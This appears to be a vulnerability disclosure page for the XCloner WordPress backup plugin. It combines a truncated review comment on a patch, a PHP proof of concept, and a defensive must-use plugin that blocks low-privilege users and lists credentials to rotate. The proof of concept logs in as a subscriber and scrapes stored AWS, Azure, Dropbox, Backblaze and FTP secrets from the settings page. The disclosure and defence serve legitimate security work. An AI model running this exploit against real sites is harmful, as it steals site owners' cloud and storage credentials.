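Review bot: the unchanged last line of this hunk prints the stored `xcloner_sftp_private_key` option in full between the `<textarea>` tags, while the password field in the previous hunk is at least masked; the patch only touches the label and placeholder around it. Avoid sending the stored key back to the browser (render the field empty and keep the saved value when nothing is submitted), and use `esc_textarea()` for textarea content. `type` and `value` are also not valid attributes on `<textarea>`.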
@@ -76,10 +76,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_root"><?php echo __("SFTP Storage Folder", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_root"><?php echo esc_html__("SFTP Storage Folder", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("SFTP Storage Folder", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Storage Folder", 'xcloner-backup-and-restore

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48965 - Backup, Restore and Migrate your sites with XCloner <= 4.8.6 - Authenticated (Subscriber+) Information Exposure

// Set target WordPress URL and credentials
$target_url = 'http://wordpress.local';
$username = 'subscriber';
$password = 'subscriber_password';

// Step 1: Login as subscriber
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
)));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

// Step 2: Access the XCloner settings page where secrets are displayed
$admin_url = $target_url . '/wp-admin/admin.php?page=xcloner_backup_and_restore';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);

// Step 3: Extract secrets from the HTML
$pattern = '/<input[^>]*name="xcloner_aws_secret"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "AWS Secret: " . $matches[1] . "\n";
}

$pattern = '/<input[^>]*name="xcloner_azure_api_key"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "Azure API Key: " . $matches[1] . "\n";
}

$pattern = '/<input[^>]*name="xcloner_dropbox_app_secret"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "Dropbox App Secret: " . $matches[1] . "\n";
}

$pattern = '/<input[^>]*name="xcloner_backblaze_application_key"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "Backblaze Application Key: " . $matches[1] . "\n";
}

$pattern = '/<input[^>]*name="xcloner_ftp_password"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "FTP Password: " . $matches[1] . "\n";
}

curl_close($ch);
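
An interim control a site operator could deploy until 4.8.7 is installed, shown as an added example that is not Atomic Edge's or XCloner's code: a must-use plugin that refuses XCloner admin pages to users without `manage_options` and tells administrators which stored credentials (names only) to rotate. The `xcg_`/`XCG_` names, the `manage_options` requirement and the `xcloner` slug-prefix match are assumptions; the option names are the ones quoted on this page.

```php
<?php
/**
 * Plugin Name: XCloner settings guard (added example, not XCloner code)
 * Place in wp-content/mu-plugins/ as an interim control until 4.8.7 is installed.
 */

// Option names quoted on this page; values are only tested for presence, never output.
const XCG_SECRET_OPTIONS = array(
    'xcloner_aws_secret',
    'xcloner_azure_api_key',
    'xcloner_dropbox_app_secret',
    'xcloner_backblaze_application_key',
    'xcloner_ftp_password',
    'xcloner_sftp_private_key',
);
// Assumptions: administrators only, and every XCloner admin slug starts with "xcloner".
const XCG_REQUIRED_CAP = 'manage_options';
const XCG_SLUG_PREFIX  = 'xcloner';

// Deny XCloner admin pages before any partial is rendered.
add_action( 'admin_init', function () {
    global $plugin_page; // set by wp-admin/admin.php from $_GET['page'], already normalised
    if ( ! is_string( $plugin_page ) || 0 !== strpos( $plugin_page, XCG_SLUG_PREFIX ) ) {
        return;
    }
    if ( current_user_can( XCG_REQUIRED_CAP ) ) {
        return;
    }
    // Leave a trace for incident response: who asked for which page.
    error_log( sprintf( 'xcloner-guard: denied user_id=%d page=%s', get_current_user_id(), sanitize_key( $plugin_page ) ) );
    wp_die( esc_html( 'You are not allowed to view this page.' ), '', array( 'response' => 403 ) );
} );

// Names of credential options that currently hold a value and should be rotated.
function xcg_populated_secret_options() {
    return array_values( array_filter( XCG_SECRET_OPTIONS, function ( $name ) {
        $value = get_option( $name, '' );
        return is_string( $value ) && '' !== trim( $value );
    } ) );
}

// Remind administrators which credentials were readable while <= 4.8.6 was active.
add_action( 'admin_notices', function () {
    $names = xcg_populated_secret_options();
    if ( ! current_user_can( XCG_REQUIRED_CAP ) || ! $names ) {
        return;
    }
    printf( '<div class="notice notice-warning"><p>%s <code>%s</code></p></div>',
        esc_html( 'Rotate these XCloner credentials after updating to 4.8.7:' ),
        esc_html( implode( ', ', $names ) ) );
} );
```

Denied requests appear in the PHP error log with the `xcloner-guard:` prefix, which gives a simple string to alert on while the vulnerable version is still installed.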
